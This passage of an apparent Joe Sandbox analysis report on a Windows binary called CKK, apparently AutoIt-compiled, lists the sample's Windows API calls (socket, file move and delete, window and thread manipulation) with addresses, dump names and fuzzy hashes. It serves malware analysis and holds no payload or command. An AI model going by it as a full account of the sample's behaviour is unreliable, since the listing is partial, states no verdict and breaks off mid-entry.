                                          • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00E5F953
                                          • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00E9F3D1
                                          • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00E9F454
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 9c889b5849421cc5a78b8accd82a1dda02d3225aa3e1c93419c8650b14f49bb6
                                          • Instruction ID: 17a4e69865342fde6c06e6f83e885f2161124e0fc2c15a93f66fa64921cd8021
                                          • Opcode Fuzzy Hash: 9c889b5849421cc5a78b8accd82a1dda02d3225aa3e1c93419c8650b14f49bb6
                                          • Instruction Fuzzy Hash: E6414031504A80BECB348B79D9887AA7BD1BBD635AF14783DE857B2560C671D488C711
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00ED2D1B
                                          • GetDC.USER32(00000000), ref: 00ED2D23
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ED2D2E
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00ED2D3A
                                          • CreateFontW.GDI32 ref: 00ED2D76
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00ED2D87
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ED2DC2
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00ED2DE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 9ac7d97e943a787bd0c943834d328580d70de4825014d392990d932fa325d548
                                          • Instruction ID: 6bcfc957c7d86159057803afc26c3bd19136da4c2ebb8367243c2336d6e2f487
                                          • Opcode Fuzzy Hash: 9ac7d97e943a787bd0c943834d328580d70de4825014d392990d932fa325d548
                                          • Instruction Fuzzy Hash: BC31AE72202214BFEB118F51DC8AFEB3FADEF19755F144056FE08AA291C6759C41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 87a98ab4f77f0d3fec6f0d8f83887b5ec44708487b3e162d553a5faf3d89ff34
                                          • Instruction ID: fda035ffbc755e9b7ae9aabebd4edf0ed6b81a3062c308f632feb057ea846190
                                          • Opcode Fuzzy Hash: 87a98ab4f77f0d3fec6f0d8f83887b5ec44708487b3e162d553a5faf3d89ff34
                                          • Instruction Fuzzy Hash: D121DA636C0B05B7D21595105E82FFA739CEF6A388F456022FD067E741F720FD1181A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 8774c203ff527fd636b2c6a3e20a1941dbf707168a18225c0f3f0ce5e6793a95
                                          • Instruction ID: 1e86bbe561bc673312c02fc4999c90f1698d9087d93bf410a067c62f713dbf0d
                                          • Opcode Fuzzy Hash: 8774c203ff527fd636b2c6a3e20a1941dbf707168a18225c0f3f0ce5e6793a95
                                          • Instruction Fuzzy Hash: FFD1AE72A0060A9FDF14CF98C981FAEB7B5BF48344F14906DE915BB281D772E986CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000000), ref: 00E815CE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 00E81651
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E817FB), ref: 00E816E4
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 00E816FB
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E81777
                                          • __freea.LIBCMT ref: 00E817A2
                                          • __freea.LIBCMT ref: 00E817AE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 2829977744-0
                                          • Opcode ID: 6f086f8591e48f68ac799a6befb344f564a33e25fc80df3a074a84fa0b24a662
                                          • Instruction ID: 11a2eb21246f0f0dc470b831a69aeae5bbb9861f86c31c94da705990384db0db
                                          • Opcode Fuzzy Hash: 6f086f8591e48f68ac799a6befb344f564a33e25fc80df3a074a84fa0b24a662
                                          • Instruction Fuzzy Hash: 4991B371E002169ADB20AF74D841AEE7BF9EF49354F18669AE80DF7181D735CC42CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2610073882-625585964
                                          • Opcode ID: b016fdf763cd5482a2561356bf4b246a93168c42827e7c4e43e0cd875948bde1
                                          • Instruction ID: 6f7d13fc56f42cabc31211c69096c2a5cf8e90b28dcb1bc5e00a930786e8469e
                                          • Opcode Fuzzy Hash: b016fdf763cd5482a2561356bf4b246a93168c42827e7c4e43e0cd875948bde1
                                          • Instruction Fuzzy Hash: 1091ADB0A00219ABDF20CFA4C954FAEBBB8EF46714F10955EF505BB2C0D7719946CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00EB125C
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB1284
                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00EB12A8
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB12D8
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB135F
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB13C4
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB1430
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                          • String ID:
                                          • API String ID: 2550207440-0
                                          • Opcode ID: b8ac6cc66389ba997798a86999b0885c221b0b2a43c6ed857eb3911350a25d8f
                                          • Instruction ID: f32a3651642e62ab668c47e07d71f204be6c88a9943d20c0f46bfeac11c5ac5b
                                          • Opcode Fuzzy Hash: b8ac6cc66389ba997798a86999b0885c221b0b2a43c6ed857eb3911350a25d8f
                                          • Instruction Fuzzy Hash: F191DD71A00219AFDB009FA8D8A4BEFB7F5FF45325F1050A9E910FB2A1D774A941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: a3dc267ffcffdee285cf28971c9187ac05f76f1311874feb813d93315e5de164
                                          • Instruction ID: 0e453b04db58b4d5fd563277b4b9d1e65502f9a7c9c2efbed517fef6e045b4ca
                                          • Opcode Fuzzy Hash: a3dc267ffcffdee285cf28971c9187ac05f76f1311874feb813d93315e5de164
                                          • Instruction Fuzzy Hash: 1A914871D00219EFCB10CFA9CC84AEEBBB8FF48320F149555E915B7252D378A955CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00EC396B
                                          • CharUpperBuffW.USER32(?,?), ref: 00EC3A7A
                                          • _wcslen.LIBCMT ref: 00EC3A8A
                                          • VariantClear.OLEAUT32 ref: 00EC3C1F
                                            • Part of subcall function 00EB0CDF: VariantInit.OLEAUT32(00000000), ref: 00EB0D1F
                                            • Part of subcall function 00EB0CDF: VariantCopy.OLEAUT32 ref: 00EB0D28
                                            • Part of subcall function 00EB0CDF: VariantClear.OLEAUT32 ref: 00EB0D34
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4137639002-1221869570
                                          • Opcode ID: 46173c3f5c924353c4c125bc43a581e26bc242be226a33525d385cc9a129431c
                                          • Instruction ID: cc4406ed9777d18d69dcd13f6d30c68630b009058372202029bcfe71564db454
                                          • Opcode Fuzzy Hash: 46173c3f5c924353c4c125bc43a581e26bc242be226a33525d385cc9a129431c
                                          • Instruction Fuzzy Hash: 21915A75A083019FC704EF24C580A6AB7E5FF89314F14996DF889AB351DB31EE46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA000E: CLSIDFromProgID.OLE32 ref: 00EA002B
                                            • Part of subcall function 00EA000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA0046
                                            • Part of subcall function 00EA000E: lstrcmpiW.KERNEL32 ref: 00EA0054
                                            • Part of subcall function 00EA000E: CoTaskMemFree.OLE32 ref: 00EA0064
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EC4C51
                                          • _wcslen.LIBCMT ref: 00EC4D59
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EC4DCF
                                          • CoTaskMemFree.OLE32 ref: 00EC4DDA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 614568839-2785691316
                                          • Opcode ID: b42a7e126d594fe774e103495b45504c0fccda28c9ae7a06134cd3d9b5fb171a
                                          • Instruction ID: 7efb8c24e2c97cb7b04f166fdae6ef54f90bdab476d32a45d15506d1e6acc57f
                                          • Opcode Fuzzy Hash: b42a7e126d594fe774e103495b45504c0fccda28c9ae7a06134cd3d9b5fb171a
                                          • Instruction Fuzzy Hash: DD9127B1D002199FDF14DFA4D890EEEBBB8BF08314F10516AE915BB291DB315A45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetMenu.USER32 ref: 00ED2183
                                          • GetMenuItemCount.USER32(00000000), ref: 00ED21B5
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00ED21DD
                                          • _wcslen.LIBCMT ref: 00ED2213
                                          • GetMenuItemID.USER32(?,?), ref: 00ED224D
                                          • GetSubMenu.USER32 ref: 00ED225B
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • PostMessageW.USER32 ref: 00ED22E3
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                          • String ID:
                                          • API String ID: 4196846111-0
                                          • Opcode ID: 107ef2100d209f2fef3b7232ceaaf20d7fe601f976f12f3f358f8b39fb33b704
                                          • Instruction ID: 0de30793a11257d6f62fff956cdd1e6efde87e5d80f42686aa8eac7ddb070936
                                          • Opcode Fuzzy Hash: 107ef2100d209f2fef3b7232ceaaf20d7fe601f976f12f3f358f8b39fb33b704
                                          • Instruction Fuzzy Hash: A8719D35A00205AFCB10DF64C841AAEB7F5EF98310F14945EEA26FB351DB35EE428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: d3742b4b2d6e4adced2cae38e52fbe23e7872cc49037d31ba46e06b0cbc4ba06
                                          • Instruction ID: 64a21f1a8dd9cef2de80d49d4351d7782b9e8f8bbdde54ad4533e17f07b9ce19
                                          • Opcode Fuzzy Hash: d3742b4b2d6e4adced2cae38e52fbe23e7872cc49037d31ba46e06b0cbc4ba06
                                          • Instruction Fuzzy Hash: 2851A1A06047D57DFB364234CC45BBABEE95B0B308F0C959AE1E9694D3C398B8C8D761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: cd6c720ed9dbd346596bca661c55961ea46415057befb20c3c27c122e0934c1f
                                          • Instruction ID: 0bb846b9dcbcafe2b78f4a2e6e01b234125d7dd69c170b7bbffdad4ee7b587c0
                                          • Opcode Fuzzy Hash: cd6c720ed9dbd346596bca661c55961ea46415057befb20c3c27c122e0934c1f
                                          • Instruction Fuzzy Hash: C651B1A15047D53DFB3782248C55B7ABEE85B4B308F0CA499E1D56E8C2D394FC88E762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: b1d2584cd52ba57a4b2f81552fd9a4ddb0389c3d9d7cd78d477568355f725ea2
                                          • Instruction ID: 08ea1f466b4951d206d57d74364a43a5c3d74fc5251e306170f658535b1c9d7d
                                          • Opcode Fuzzy Hash: b1d2584cd52ba57a4b2f81552fd9a4ddb0389c3d9d7cd78d477568355f725ea2
                                          • Instruction Fuzzy Hash: A951C371A006499FDB10CFA8D845AEEBBF9EF09300F14915AF959F7291E7709A41CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                            • Part of subcall function 00EC304E: _wcslen.LIBCMT ref: 00EC309B
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EC1112
                                          • WSAGetLastError.WSOCK32 ref: 00EC1121
                                          • WSAGetLastError.WSOCK32 ref: 00EC11C9
                                          • closesocket.WSOCK32(00000000), ref: 00EC11F9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 2675159561-0
                                          • Opcode ID: b3d58cc91b204d878eac776423f070a1d24fd37a0032fef4d6c23c93e09f3784
                                          • Instruction ID: c6ee3c473a1b174a36258815ca5a08abbf64193c667d71cf6c4ed9a0d421e5e8
                                          • Opcode Fuzzy Hash: b3d58cc91b204d878eac776423f070a1d24fd37a0032fef4d6c23c93e09f3784
                                          • Instruction Fuzzy Hash: 31412631201205AFDB109F24D944FA9B7E9EF42368F188099FD15BB282C779ED46CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADDFD
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADE16
                                          • lstrcmpiW.KERNEL32 ref: 00EACF45
                                          • MoveFileW.KERNEL32 ref: 00EACF7F
                                          • _wcslen.LIBCMT ref: 00EAD005
                                          • _wcslen.LIBCMT ref: 00EAD01B
                                          • SHFileOperationW.SHELL32(?), ref: 00EAD061
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 3164238972-1173974218
                                          • Opcode ID: 43f4a9803427c3664b6eb5cfb1c8234cdb01baa90abffc9ba1204462a19c1b0d
                                          • Instruction ID: bdb834b0035608c79aa57c4a8aff04b30b679d09253491f862cd5c4f839c9b27
                                          • Opcode Fuzzy Hash: 43f4a9803427c3664b6eb5cfb1c8234cdb01baa90abffc9ba1204462a19c1b0d
                                          • Instruction Fuzzy Hash: 854163759452199EDF12EBA4DD81ADEB7F9AF0D380F1010E6E505FF142EA34BA48CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED2E1C
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2E4F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2E84
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00ED2EB6
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00ED2EE0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2EF1
                                          • SetWindowLongW.USER32 ref: 00ED2F0B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: c1e0075132796b7b62d1594597beceb35ed3730008d737b31ed8f1b40e8913f8
                                          • Instruction ID: cffaae7062b80b5f2377fe1877905cc5de853d2bb572238bc47f7e64c5d4331e
